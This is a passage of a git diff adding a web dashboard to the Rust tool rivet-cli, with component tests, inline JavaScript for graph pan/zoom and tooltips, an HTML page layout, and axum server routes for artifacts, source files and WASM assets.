]; + let rows = vec![vec!["REQ-001".into(), "First req".into()]]; + let p = ViewParams { + sort: Some("id".into()), + dir: Some("asc".into()), + ..Default::default() + }; + let html = sortable_table(&TableConfig { + base_url: "/artifacts", + columns: &cols, + rows: &rows, + params: &p, + }); + assert!(html.contains("")); + assert!(html.contains("ID")); // ↑ arrow for ascending sort on id + assert!(html.contains("REQ-001")); + } + + #[test] + fn collapsible_tree_respects_open_ids() { + let nodes = vec![TreeNode { + id: "H-1".into(), + summary_html: "H-1".into(), + detail_html: "Hazard details".into(), + children: vec![TreeNode { + id: "SC-1".into(), + summary_html: "SC-1".into(), + detail_html: "Constraint details".into(), + children: vec![], + }], + }]; + let p = ViewParams::default(); + let html = collapsible_tree(&nodes, &["H-1".into()], "/stpa", &p); + // H-1 should be open, SC-1 should be closed + assert!(html.contains("
+(function(){ + // ── Loading bar ────────────────────────────────────────── + var bar=document.getElementById('loading-bar'); + if(bar){ + document.body.addEventListener('htmx:beforeRequest',function(){ + bar.classList.remove('done'); + bar.style.width='0'; + void bar.offsetWidth; + bar.classList.add('active'); + }); + document.body.addEventListener('htmx:afterRequest',function(){ + bar.classList.remove('active'); + bar.classList.add('done'); + bar.style.width='100%'; + setTimeout(function(){bar.classList.remove('done');bar.style.width='0'},400); + }); + } + + // ── Nav active state ───────────────────────────────────── + function setActiveNav(url){ + document.querySelectorAll('nav a[hx-get]').forEach(function(a){ + var href=a.getAttribute('hx-get'); + if(url===href || (href!=='/' && url.startsWith(href))){ + a.classList.add('active'); + } else { + a.classList.remove('active'); + } + }); + } + document.body.addEventListener('htmx:afterRequest',function(e){ + var path=e.detail.pathInfo&&e.detail.pathInfo.requestPath; + if(path) setActiveNav(path); + }); + // Set initial active state + document.addEventListener('DOMContentLoaded',function(){ + var p=window.location.pathname; + if(p==='/'||p==='') p='/stats'; + setActiveNav(p); + }); + + // ── Browser back/forward ───────────────────────────────── + window.addEventListener('popstate',function(){ + var p=window.location.pathname; + if(p==='/'||p==='') p='/stats'; + setActiveNav(p); + htmx.ajax('GET',p,'#content'); + }); + + // ── Source line anchor scroll ──────────────────────────── + function scrollToLineAnchor(){ + var h=window.location.hash; + if(h&&h.match(/^#L\d+$/)){ + var el=document.getElementById(h.substring(1)); + if(el){el.scrollIntoView({behavior:'smooth',block:'center'});} + } + } + document.body.addEventListener('htmx:afterSwap',scrollToLineAnchor); + document.addEventListener('DOMContentLoaded',scrollToLineAnchor); + + // ── Pan/zoom ───────────────────────────────────────────── + document.addEventListener('htmx:afterSwap', initPanZoom); + document.addEventListener('DOMContentLoaded', initPanZoom); + + function initPanZoom(){ + document.querySelectorAll('.graph-container').forEach(function(c){ + if(c._pz) return; + c._pz=true; + var svg=c.querySelector('svg'); + if(!svg) return; + var vb=svg.viewBox.baseVal; + var origVB={x:vb.x, y:vb.y, w:vb.width, h:vb.height}; + var drag=false, sx=0, sy=0, ox=0, oy=0; + + // Pan (mousedown only — move/up handled in node-drag block) + c.addEventListener('mousedown',function(e){ + if(e.target.closest('.graph-controls')) return; + if(e.target.closest('.node')) return; // let node drag handle it + drag=true; sx=e.clientX; sy=e.clientY; + ox=vb.x; oy=vb.y; e.preventDefault(); + }); + c.addEventListener('mouseleave',function(){ drag=false; }); + + // Zoom with wheel + c.addEventListener('wheel',function(e){ + e.preventDefault(); + var f=e.deltaY>0?1.12:1/1.12; + var r=c.getBoundingClientRect(); + var mx=(e.clientX-r.left)/r.width; + var my=(e.clientY-r.top)/r.height; + var nx=vb.width*f, ny=vb.height*f; + vb.x+=(vb.width-nx)*mx; + vb.y+=(vb.height-ny)*my; + vb.width=nx; vb.height=ny; + },{passive:false}); + + // Touch support + var lastDist=0, lastMid=null; + c.addEventListener('touchstart',function(e){ + if(e.touches.length===1){ + drag=true; sx=e.touches[0].clientX; sy=e.touches[0].clientY; + ox=vb.x; oy=vb.y; + } else if(e.touches.length===2){ + drag=false; + var dx=e.touches[1].clientX-e.touches[0].clientX; + var dy=e.touches[1].clientY-e.touches[0].clientY; + lastDist=Math.sqrt(dx*dx+dy*dy); + lastMid={x:(e.touches[0].clientX+e.touches[1].clientX)/2, + y:(e.touches[0].clientY+e.touches[1].clientY)/2}; + } + },{passive:true}); + c.addEventListener('touchmove',function(e){ + if(e.touches.length===1 && drag){ + e.preventDefault(); + var scale=vb.width/c.clientWidth; + vb.x=ox-(e.touches[0].clientX-sx)*scale; + vb.y=oy-(e.touches[0].clientY-sy)*scale; + } else if(e.touches.length===2){ + e.preventDefault(); + var dx=e.touches[1].clientX-e.touches[0].clientX; + var dy=e.touches[1].clientY-e.touches[0].clientY; + var dist=Math.sqrt(dx*dx+dy*dy); + var f=lastDist/dist; + var r=c.getBoundingClientRect(); + var mid={x:(e.touches[0].clientX+e.touches[1].clientX)/2, + y:(e.touches[0].clientY+e.touches[1].clientY)/2}; + var mx=(mid.x-r.left)/r.width; + var my=(mid.y-r.top)/r.height; + var nx=vb.width*f, ny=vb.height*f; + vb.x+=(vb.width-nx)*mx; + vb.y+=(vb.height-ny)*my; + vb.width=nx; vb.height=ny; + lastDist=dist; lastMid=mid; + } + },{passive:false}); + c.addEventListener('touchend',function(){ drag=false; lastDist=0; }); + + // Zoom buttons + var controls=c.querySelector('.graph-controls'); + if(controls){ + controls.querySelector('.zoom-in').addEventListener('click',function(){ + var cx=vb.x+vb.width/2, cy=vb.y+vb.height/2; + vb.width/=1.3; vb.height/=1.3; + vb.x=cx-vb.width/2; vb.y=cy-vb.height/2; + }); + controls.querySelector('.zoom-out').addEventListener('click',function(){ + var cx=vb.x+vb.width/2, cy=vb.y+vb.height/2; + vb.width*=1.3; vb.height*=1.3; + vb.x=cx-vb.width/2; vb.y=cy-vb.height/2; + }); + controls.querySelector('.zoom-fit').addEventListener('click',function(){ + vb.x=origVB.x; vb.y=origVB.y; vb.width=origVB.w; vb.height=origVB.h; + }); + } + + // ── Node dragging + click ────────────────────────────── + var dragNode=null, dnSX=0, dnSY=0, dnOX=0, dnOY=0, dnMoved=false; + var nodeOffsets={}; // id -> {dx,dy} + + function getNodeCenter(node){ + var r=node.querySelector('rect'); + if(!r) return {x:0,y:0}; + var x=parseFloat(r.getAttribute('x'))||0; + var y=parseFloat(r.getAttribute('y'))||0; + var w=parseFloat(r.getAttribute('width'))||0; + var h=parseFloat(r.getAttribute('height'))||0; + var id=node.getAttribute('data-id')||''; + var off=nodeOffsets[id]||{dx:0,dy:0}; + return {x:x+w/2+off.dx, y:y+h/2+off.dy}; + } + + function updateEdges(){ + svg.querySelectorAll('.edge').forEach(function(edge){ + var src=edge.getAttribute('data-source'); + var tgt=edge.getAttribute('data-target'); + var srcOff=nodeOffsets[src]||{dx:0,dy:0}; + var tgtOff=nodeOffsets[tgt]||{dx:0,dy:0}; + var path=edge.querySelector('path'); + if(!path) return; + var origD=path.getAttribute('data-orig-d'); + if(!origD){ origD=path.getAttribute('d'); path.setAttribute('data-orig-d',origD); } + // Parse path points and offset them + var newD=offsetPath(origD,srcOff,tgtOff); + path.setAttribute('d',newD); + // Move label + var lbg=edge.querySelector('.label-bg'); + var ltxt=edge.querySelector('text'); + if(lbg){ + var ox=lbg.getAttribute('data-orig-x'); + if(!ox){ ox=lbg.getAttribute('x'); lbg.setAttribute('data-orig-x',ox); + var oy=lbg.getAttribute('y'); lbg.setAttribute('data-orig-y',oy); } + var avgDx=(srcOff.dx+tgtOff.dx)/2; + var avgDy=(srcOff.dy+tgtOff.dy)/2; + lbg.setAttribute('x',parseFloat(lbg.getAttribute('data-orig-x'))+avgDx); + lbg.setAttribute('y',parseFloat(lbg.getAttribute('data-orig-y'))+avgDy); + } + if(ltxt){ + var otx=ltxt.getAttribute('data-orig-x'); + if(!otx){ otx=ltxt.getAttribute('x'); ltxt.setAttribute('data-orig-x',otx); + var oty=ltxt.getAttribute('y'); ltxt.setAttribute('data-orig-y',oty); } + var avgDx2=(srcOff.dx+tgtOff.dx)/2; + var avgDy2=(srcOff.dy+tgtOff.dy)/2; + ltxt.setAttribute('x',parseFloat(ltxt.getAttribute('data-orig-x'))+avgDx2); + ltxt.setAttribute('y',parseFloat(ltxt.getAttribute('data-orig-y'))+avgDy2); + } + }); + } + + function offsetPath(d,srcOff,tgtOff){ + // SVG path: M x y, L x y, C x y x y x y, etc. + // Split into commands and offset first point by srcOff, last by tgtOff, middle interpolated + var tokens=d.match(/[MLCQZ]|[-]?[\d.]+/gi); + if(!tokens) return d; + var pts=[]; + var i=0; + while(i1?j/(n-1):0; + pts[j].x+= srcOff.dx*(1-frac)+tgtOff.dx*frac; + pts[j].y+= srcOff.dy*(1-frac)+tgtOff.dy*frac; + } + // Rebuild + var out=''; + for(var j=0;j2||Math.abs(dy)>2) dnMoved=true; + var nid=dragNode.getAttribute('data-id')||''; + nodeOffsets[nid]={dx:dnOX+dx, dy:dnOY+dy}; + dragNode.setAttribute('transform','translate('+nodeOffsets[nid].dx+','+nodeOffsets[nid].dy+')'); + updateEdges(); + return; // don't pan while dragging a node + } + if(!drag) return; + var scale2=vb.width/c.clientWidth; + vb.x=ox-(e.clientX-sx)*scale2; + vb.y=oy-(e.clientY-sy)*scale2; + }); + c.addEventListener('mouseup',function(){ + if(dragNode){ dragNode.style.cursor='grab'; dragNode=null; } + drag=false; + }); + + // Fit to container on first load with some padding + var padding=40; + vb.x=-padding; vb.y=-padding; + vb.width=origVB.w+padding*2; + vb.height=origVB.h+padding*2; + origVB={x:vb.x, y:vb.y, w:vb.width, h:vb.height}; + }); + } + + // ── Artifact hover preview tooltip ─────────────────────── + (function(){ + var tip=document.createElement('div'); + tip.className='art-tooltip'; + document.body.appendChild(tip); + var timer=null, ctrl=null, currentEl=null; + + function show(el){ + var href=el.getAttribute('hx-get')||''; + var m=href.match(/^\/artifacts\/(.+)$/); + if(!m) return; + var id=m[1]; + if(ctrl) ctrl.abort(); + ctrl=new AbortController(); + fetch('/artifacts/'+encodeURIComponent(id)+'/preview',{signal:ctrl.signal,headers:{'HX-Request':'true'}}) + .then(function(r){return r.text()}) + .then(function(html){ + tip.innerHTML=html; + tip.classList.add('visible'); + position(el); + }).catch(function(){}); + } + + function position(el){ + var r=el.getBoundingClientRect(); + var tw=tip.offsetWidth, th=tip.offsetHeight; + var left=r.left+r.width/2-tw/2; + var top=r.top-th-6; + if(top<4){ top=r.bottom+6; } + if(left<4) left=4; + if(left+tw>window.innerWidth-4) left=window.innerWidth-tw-4; + tip.style.left=left+'px'; + tip.style.top=top+window.scrollY+'px'; + } + + function hide(){ + clearTimeout(timer); timer=null; + if(ctrl){ ctrl.abort(); ctrl=null; } + tip.classList.remove('visible'); + currentEl=null; + } + + document.body.addEventListener('mouseenter',function(e){ + var el=e.target.closest('[hx-get^="/artifacts/"]'); + if(!el||el.getAttribute('hx-get').indexOf('/preview')!==-1) return; + currentEl=el; + timer=setTimeout(function(){ show(el); },300); + },true); + + document.body.addEventListener('mouseleave',function(e){ + var el=e.target.closest('[hx-get^="/artifacts/"]'); + if(el&&el===currentEl) hide(); + },true); + + // also hide when clicking (navigating away) + document.body.addEventListener('click',function(){ hide(); },true); + })(); + + // ── SVG viewer: fullscreen / popout / zoom-fit ────────────── + window.svgFullscreen=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + viewer.classList.toggle('fullscreen'); + var isFS=viewer.classList.contains('fullscreen'); + btn.textContent=isFS?'\u2715':'\u26F6'; + btn.title=isFS?'Exit fullscreen':'Fullscreen'; + }; + + window.svgPopout=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + var svg=viewer.querySelector('svg'); + if(!svg) return; + var popup=window.open('','_blank','width=1200,height=800'); + var doc=popup.document; + doc.open(); + var style=doc.createElement('style'); + style.textContent='body{margin:0;background:#fafbfc;display:flex;align-items:center;justify-content:center;min-height:100vh} svg{max-width:95vw;max-height:95vh}'; + doc.head.appendChild(style); + doc.title='Rivet Graph'; + doc.body.appendChild(svg.cloneNode(true)); + doc.close(); + }; + + window.svgZoomFit=function(btn){ + var viewer=btn.closest('.svg-viewer'); + if(!viewer) return; + var container=viewer.querySelector('.graph-container'); + var svg=viewer.querySelector('svg'); + if(!svg) return; + // Trigger the existing zoom-fit button if present + if(container){ + var fitBtn=container.querySelector('.zoom-fit'); + if(fitBtn){ fitBtn.click(); return; } + } + // Fallback: reset viewBox from bounding box + var bbox=svg.getBBox(); + var pad=40; + svg.setAttribute('viewBox', + (bbox.x-pad)+' '+(bbox.y-pad)+' '+(bbox.width+pad*2)+' '+(bbox.height+pad*2)); + }; + + document.addEventListener('keydown',function(e){ + if(e.key==='Escape'){ + document.querySelectorAll('.svg-viewer.fullscreen').forEach(function(v){ + v.classList.remove('fullscreen'); + var btn=v.querySelector('.svg-viewer-toolbar button[title="Exit fullscreen"]'); + if(btn){ btn.textContent='\u26F6'; btn.title='Fullscreen'; } + }); + } + }); +})(); + +"#; + +pub const SEARCH_JS: &str = r#" + +"#; + +pub const AADL_JS: &str = r#" + +"#; diff --git a/rivet-cli/src/serve/layout.rs b/rivet-cli/src/serve/layout.rs new file mode 100644 index 0000000..1c1ccc3 --- /dev/null +++ b/rivet-cli/src/serve/layout.rs @@ -0,0 +1,245 @@ +use axum::response::Html; + +use super::js::{AADL_JS, GRAPH_JS, SEARCH_JS}; +use super::styles::CSS; +use super::{AppState, html_escape}; +use rivet_core::schema::Severity; +use rivet_core::validate; + +/// Render content in print-friendly layout (no nav, no HTMX, no JS). +pub(crate) fn print_layout(content: &str, state: &AppState) -> Html { + Html(format!( + r##" + + + + +{project} — Rivet + + + + + + +
{content}
+ +"##, + project = html_escape(&state.context.project_name), + )) +} + +pub(crate) fn page_layout(content: &str, state: &AppState) -> Html { + let artifact_count = state.store.len(); + let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); + let error_count = diagnostics + .iter() + .filter(|d| d.severity == Severity::Error) + .count(); + let error_badge = if error_count > 0 { + format!("{error_count}") + } else { + "OK".to_string() + }; + let doc_badge = if !state.doc_store.is_empty() { + format!("{}", state.doc_store.len()) + } else { + String::new() + }; + let result_badge = if !state.result_store.is_empty() { + format!( + "{}", + state.result_store.len() + ) + } else { + String::new() + }; + let stpa_types = [ + "loss", + "hazard", + "sub-hazard", + "system-constraint", + "controller", + "controlled-process", + "control-action", + "uca", + "controller-constraint", + "loss-scenario", + ]; + let stpa_count: usize = stpa_types + .iter() + .map(|t| state.store.count_by_type(t)) + .sum(); + let stpa_nav = if stpa_count > 0 { + format!( + "
  • STPA{stpa_count}
  • " + ) + } else { + String::new() + }; + let version = env!("CARGO_PKG_VERSION"); + + // Context bar + let ctx = &state.context; + let git_html = if let Some(ref git) = ctx.git { + let status = if git.is_dirty { + format!( + "{} uncommitted", + git.dirty_count + ) + } else { + "clean".to_string() + }; + format!( + "/\ + {branch}@{commit}\ + {status}", + branch = html_escape(&git.branch), + commit = html_escape(&git.commit_short), + ) + } else { + String::new() + }; + // Project switcher: show siblings as a dropdown if available + let switcher_html = if ctx.siblings.is_empty() { + String::new() + } else { + let mut s = String::from( + "\ +
    \ + \ +
    ", + ); + for sib in &ctx.siblings { + s.push_str(&format!( + "
    \ + {}\ + rivet -p {} serve -P {}\ +
    ", + html_escape(&sib.name), + html_escape(&sib.rel_path), + ctx.port, + )); + } + s.push_str("
    "); + s + }; + let context_bar = format!( + "
    \ + {project}{switcher_html}\ + /\ + {path}\ + {git_html}\ + Loaded {loaded_at}\ + \ + \ +
    ", + project = html_escape(&ctx.project_name), + path = html_escape(&ctx.project_path), + loaded_at = html_escape(&ctx.loaded_at), + ); + Html(format!( + r##" + + + + +Rivet Dashboard + + + + + + + + +
    +
    + +
    +{context_bar} +
    +{content} + +
    +
    +
    +
    +
    +
    + 🔍 + +
    +
    +
    Type to search artifacts and documents
    +
    +
    +
    +{GRAPH_JS} +{SEARCH_JS} +{AADL_JS} + +"## + )) +} diff --git a/rivet-cli/src/serve/mod.rs b/rivet-cli/src/serve/mod.rs new file mode 100644 index 0000000..050338a --- /dev/null +++ b/rivet-cli/src/serve/mod.rs @@ -0,0 +1,941 @@ +use std::collections::HashMap; +use std::path::PathBuf; +use std::sync::Arc; + +use anyhow::{Context as _, Result}; +use axum::Router; +use axum::extract::{Path, State}; +use axum::response::IntoResponse; +use axum::routing::{get, post}; +use tokio::sync::RwLock; + +/// Embedded WASM/JS assets for single-binary distribution. +/// Only available when built with `--features embed-wasm` and assets exist. +#[cfg(feature = "embed-wasm")] +mod embedded_wasm { + pub const SPAR_JS: &str = include_str!("../../assets/wasm/js/spar_wasm.js"); + pub const CORE_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core.wasm"); + pub const CORE2_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core2.wasm"); + pub const CORE3_WASM: &[u8] = include_bytes!("../../assets/wasm/js/spar_wasm.core3.wasm"); +} + +#[allow(dead_code)] +pub(crate) mod components; +mod js; +mod layout; +mod styles; +mod views; + +use layout::page_layout; +use rivet_core::document::DocumentStore; +use rivet_core::links::LinkGraph; +use rivet_core::results::ResultStore; +use rivet_core::schema::Schema; +use rivet_core::store::Store; + +// ── Repository context ────────────────────────────────────────────────── + +/// Git repository status captured at load time. +struct GitInfo { + branch: String, + commit_short: String, + is_dirty: bool, + dirty_count: usize, +} + +/// A discovered sibling project (example or peer). +struct SiblingProject { + name: String, + rel_path: String, +} + +/// Project context shown in the dashboard header. +struct RepoContext { + project_name: String, + project_path: String, + git: Option, + loaded_at: String, + siblings: Vec, + port: u16, +} + +fn capture_git_info(project_path: &std::path::Path) -> Option { + let branch = std::process::Command::new("git") + .args(["rev-parse", "--abbrev-ref", "HEAD"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string())?; + + let commit_short = std::process::Command::new("git") + .args(["rev-parse", "--short", "HEAD"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_default(); + + let porcelain = std::process::Command::new("git") + .args(["status", "--porcelain"]) + .current_dir(project_path) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).to_string()) + .unwrap_or_default(); + + let dirty_count = porcelain.lines().filter(|l| !l.is_empty()).count(); + + Some(GitInfo { + branch, + commit_short, + is_dirty: dirty_count > 0, + dirty_count, + }) +} + +/// Discover other rivet projects (examples/ and peer directories). +fn discover_siblings(project_path: &std::path::Path) -> Vec { + let mut siblings = Vec::new(); + + // Check examples/ subdirectory + let examples_dir = project_path.join("examples"); + if examples_dir.is_dir() + && let Ok(entries) = std::fs::read_dir(&examples_dir) + { + for entry in entries.flatten() { + let p = entry.path(); + if p.join("rivet.yaml").exists() + && let Some(name) = p.file_name().and_then(|n| n.to_str()) + { + siblings.push(SiblingProject { + name: name.to_string(), + rel_path: format!("examples/{name}"), + }); + } + } + } + + // If inside examples/, offer root project and peers + if let Some(parent) = project_path.parent() + && parent.file_name().and_then(|n| n.to_str()) == Some("examples") + && let Some(root) = parent.parent() + { + if root.join("rivet.yaml").exists() + && let Ok(cfg) = std::fs::read_to_string(root.join("rivet.yaml")) + { + let root_name = cfg + .lines() + .find(|l| l.trim().starts_with("name:")) + .map(|l| l.trim().trim_start_matches("name:").trim().to_string()) + .unwrap_or_else(|| { + root.file_name() + .and_then(|n| n.to_str()) + .unwrap_or("root") + .to_string() + }); + siblings.push(SiblingProject { + name: root_name, + rel_path: root.display().to_string(), + }); + } + // Peer examples + if let Ok(entries) = std::fs::read_dir(parent) { + for entry in entries.flatten() { + let p = entry.path(); + if p != project_path + && p.join("rivet.yaml").exists() + && let Some(name) = p.file_name().and_then(|n| n.to_str()) + { + siblings.push(SiblingProject { + name: name.to_string(), + rel_path: p.display().to_string(), + }); + } + } + } + } + + siblings.sort_by(|a, b| a.name.cmp(&b.name)); + siblings +} + +/// Shared application state loaded once at startup. +struct AppState { + store: Store, + schema: Schema, + graph: LinkGraph, + doc_store: DocumentStore, + result_store: ResultStore, + context: RepoContext, + /// Canonical path to the project directory (for reload). + project_path_buf: PathBuf, + /// Path to the schemas directory (for reload). + schemas_dir: PathBuf, + /// Resolved docs directories (for serving images/assets). + doc_dirs: Vec, +} + +/// Convenience alias so handler signatures stay compact. +type SharedState = Arc>; + +/// Build a fresh `AppState` by loading everything from disk. +fn reload_state( + project_path: &std::path::Path, + schemas_dir: &std::path::Path, + port: u16, +) -> Result { + let config_path = project_path.join("rivet.yaml"); + let config = rivet_core::load_project_config(&config_path) + .with_context(|| format!("loading {}", config_path.display()))?; + + let schema = rivet_core::load_schemas(&config.project.schemas, schemas_dir) + .context("loading schemas")?; + + let mut store = Store::new(); + for source in &config.sources { + let artifacts = rivet_core::load_artifacts(source, project_path) + .with_context(|| format!("loading source '{}'", source.path))?; + for artifact in artifacts { + store.upsert(artifact); + } + } + + let graph = LinkGraph::build(&store, &schema); + + let mut doc_store = DocumentStore::new(); + let mut doc_dirs = Vec::new(); + for docs_path in &config.docs { + let dir = project_path.join(docs_path); + if dir.is_dir() { + doc_dirs.push(dir.clone()); + } + let docs = rivet_core::document::load_documents(&dir) + .with_context(|| format!("loading docs from '{docs_path}'"))?; + for doc in docs { + doc_store.insert(doc); + } + } + + let mut result_store = ResultStore::new(); + if let Some(ref results_path) = config.results { + let dir = project_path.join(results_path); + let runs = rivet_core::results::load_results(&dir) + .with_context(|| format!("loading results from '{results_path}'"))?; + for run in runs { + result_store.insert(run); + } + } + + let git = capture_git_info(project_path); + let loaded_at = std::process::Command::new("date") + .arg("+%H:%M:%S") + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_else(|| "unknown".into()); + let siblings = discover_siblings(project_path); + let project_name = config.project.name.clone(); + + let context = RepoContext { + project_name, + project_path: project_path.display().to_string(), + git, + loaded_at, + siblings, + port, + }; + + Ok(AppState { + store, + schema, + graph, + doc_store, + result_store, + context, + project_path_buf: project_path.to_path_buf(), + schemas_dir: schemas_dir.to_path_buf(), + doc_dirs, + }) +} + +/// Start the axum HTTP server on the given port. +#[allow(clippy::too_many_arguments)] +pub async fn run( + store: Store, + schema: Schema, + graph: LinkGraph, + doc_store: DocumentStore, + result_store: ResultStore, + project_name: String, + project_path: PathBuf, + schemas_dir: PathBuf, + doc_dirs: Vec, + port: u16, +) -> Result<()> { + let git = capture_git_info(&project_path); + let loaded_at = std::process::Command::new("date") + .arg("+%H:%M:%S") + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_else(|| "unknown".into()); + let siblings = discover_siblings(&project_path); + let context = RepoContext { + project_name, + project_path: project_path.display().to_string(), + git, + loaded_at, + siblings, + port, + }; + + let state: SharedState = Arc::new(RwLock::new(AppState { + store, + schema, + graph, + doc_store, + result_store, + context, + project_path_buf: project_path, + schemas_dir, + doc_dirs, + })); + + let app = Router::new() + .route("/", get(views::index)) + .route("/artifacts", get(views::artifacts_list)) + .route("/artifacts/{id}", get(views::artifact_detail)) + .route("/artifacts/{id}/preview", get(views::artifact_preview)) + .route("/artifacts/{id}/graph", get(views::artifact_graph)) + .route("/validate", get(views::validate_view)) + .route("/matrix", get(views::matrix_view)) + .route("/graph", get(views::graph_view)) + .route("/stats", get(views::stats_view)) + .route("/coverage", get(views::coverage_view)) + .route("/documents", get(views::documents_list)) + .route("/documents/{id}", get(views::document_detail)) + .route("/search", get(views::search_view)) + .route("/verification", get(views::verification_view)) + .route("/stpa", get(views::stpa_view)) + .route("/results", get(views::results_view)) + .route("/results/{run_id}", get(views::result_detail)) + .route("/source", get(views::source_tree_view)) + .route("/source/{*path}", get(views::source_file_view)) + .route("/source-raw/{*path}", get(source_raw)) + .route("/diff", get(views::diff_view)) + .route("/doc-linkage", get(views::doc_linkage_view)) + .route("/traceability", get(views::traceability_view)) + .route("/traceability/history", get(views::traceability_history)) + .route("/api/links/{id}", get(api_artifact_links)) + .route("/wasm/{*path}", get(wasm_asset)) + .route("/help", get(views::help_view)) + .route("/help/docs", get(views::help_docs_list)) + .route("/help/docs/{*slug}", get(views::help_docs_topic)) + .route("/help/schema", get(views::help_schema_list)) + .route("/help/schema/{name}", get(views::help_schema_show)) + .route("/help/links", get(views::help_links_view)) + .route("/help/rules", get(views::help_rules_view)) + .route("/docs-asset/{*path}", get(docs_asset)) + .route("/reload", post(reload_handler)) + .with_state(state.clone()) + .layer(axum::middleware::from_fn_with_state(state, wrap_full_page)); + + let addr = format!("0.0.0.0:{port}"); + eprintln!("rivet dashboard listening on http://localhost:{port}"); + + let listener = tokio::net::TcpListener::bind(&addr).await?; + axum::serve(listener, app).await?; + Ok(()) +} + +/// Middleware: for direct browser requests (no HX-Request header) to view routes, +/// wrap the handler's partial HTML in the full page layout. This replaces the old +/// `/?goto=` redirect pattern and fixes query-param loss, hash-fragment loss, and +/// the async replaceState race condition. +async fn wrap_full_page( + State(state): State, + req: axum::extract::Request, + next: axum::middleware::Next, +) -> axum::response::Response { + let path = req.uri().path().to_string(); + let query = req.uri().query().unwrap_or("").to_string(); + let is_htmx = req.headers().contains_key("hx-request"); + let is_print = query.contains("print=1") || query.contains("print=true"); + let method = req.method().clone(); + + let response = next.run(req).await; + + // Only wrap GET requests to view routes (not /, assets, or APIs) + if method == axum::http::Method::GET + && !is_htmx + && path != "/" + && !path.starts_with("/api/") + && !path.starts_with("/wasm/") + && !path.starts_with("/source-raw/") + && !path.starts_with("/docs-asset/") + { + let bytes = axum::body::to_bytes(response.into_body(), 16 * 1024 * 1024) + .await + .unwrap_or_default(); + let content = String::from_utf8_lossy(&bytes); + let app = state.read().await; + if is_print { + return layout::print_layout(&content, &app).into_response(); + } + return page_layout(&content, &app).into_response(); + } + + response +} + +/// GET /api/links/{id} — return JSON array of AADL-prefixed artifact IDs linked +/// to the given artifact (forward links, backlinks, and self if applicable). +async fn api_artifact_links( + State(state): State, + Path(id): Path, +) -> axum::Json> { + let state = state.read().await; + let graph = &state.graph; + + let mut linked_ids = Vec::new(); + + // Forward links from this artifact + for link in graph.links_from(&id) { + if link.target.starts_with("AADL-") { + linked_ids.push(link.target.clone()); + } + } + + // Backlinks to this artifact + for bl in graph.backlinks_to(&id) { + if bl.source.starts_with("AADL-") { + linked_ids.push(bl.source.clone()); + } + } + + // If this IS an AADL artifact, include self + if id.starts_with("AADL-") { + linked_ids.push(id); + } + + axum::Json(linked_ids) +} + +/// GET /source-raw/{*path} — serve a project file as raw text (for WASM client-side rendering). +async fn source_raw( + State(state): State, + Path(raw_path): Path, +) -> impl IntoResponse { + let state = state.read().await; + let project_path = &state.project_path_buf; + let decoded = urlencoding::decode(&raw_path).unwrap_or(std::borrow::Cow::Borrowed(&raw_path)); + let rel_path = decoded.as_ref(); + + let full_path = project_path.join(rel_path); + let canonical = match full_path.canonicalize() { + Ok(p) => p, + Err(_) => { + return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(); + } + }; + let canonical_project = match project_path.canonicalize() { + Ok(p) => p, + Err(_) => { + return (axum::http::StatusCode::INTERNAL_SERVER_ERROR, "error").into_response(); + } + }; + if !canonical.starts_with(&canonical_project) { + return (axum::http::StatusCode::FORBIDDEN, "forbidden").into_response(); + } + + let metadata = match std::fs::symlink_metadata(&full_path) { + Ok(m) => m, + Err(_) => return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), + }; + + // Directory: return JSON listing of filenames. + if metadata.is_dir() { + let mut entries = Vec::new(); + if let Ok(dir) = std::fs::read_dir(&full_path) { + for entry in dir.flatten() { + if let Some(name) = entry.file_name().to_str() { + entries.push(name.to_string()); + } + } + } + entries.sort(); + let json = serde_json::to_string(&entries).unwrap_or_else(|_| "[]".into()); + return ( + axum::http::StatusCode::OK, + [(axum::http::header::CONTENT_TYPE, "application/json")], + json, + ) + .into_response(); + } + + match std::fs::read_to_string(&full_path) { + Ok(content) => ( + axum::http::StatusCode::OK, + [( + axum::http::header::CONTENT_TYPE, + "text/plain; charset=utf-8", + )], + content, + ) + .into_response(), + Err(_) => (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), + } +} + +/// GET /wasm/{*path} — serve jco-transpiled WASM assets for browser-side rendering. +async fn wasm_asset(Path(path): Path) -> impl IntoResponse { + let content_type = if path.ends_with(".js") { + "application/javascript" + } else if path.ends_with(".wasm") { + "application/wasm" + } else if path.ends_with(".d.ts") { + "application/typescript" + } else { + "application/octet-stream" + }; + + // Try embedded assets first (when built with embed-wasm feature). + #[cfg(feature = "embed-wasm")] + { + let bytes: Option<&[u8]> = match path.as_str() { + "spar_wasm.js" => Some(embedded_wasm::SPAR_JS.as_bytes()), + "spar_wasm.core.wasm" => Some(embedded_wasm::CORE_WASM), + "spar_wasm.core2.wasm" => Some(embedded_wasm::CORE2_WASM), + "spar_wasm.core3.wasm" => Some(embedded_wasm::CORE3_WASM), + _ => None, + }; + if let Some(data) = bytes { + return ( + axum::http::StatusCode::OK, + [ + (axum::http::header::CONTENT_TYPE, content_type), + (axum::http::header::CACHE_CONTROL, "public, max-age=86400"), + ], + data.to_vec(), + ) + .into_response(); + } + } + + // Fallback to filesystem (development mode). + // Try the workspace assets dir first, then next to the binary. + let candidates = [ + std::env::current_dir() + .unwrap_or_default() + .join("rivet-cli/assets/wasm/js") + .join(&path), + std::env::current_exe() + .unwrap_or_default() + .parent() + .unwrap_or(std::path::Path::new(".")) + .join("assets/wasm/js") + .join(&path), + ]; + + for candidate in &candidates { + if let Ok(bytes) = std::fs::read(candidate) { + return ( + axum::http::StatusCode::OK, + [ + (axum::http::header::CONTENT_TYPE, content_type), + 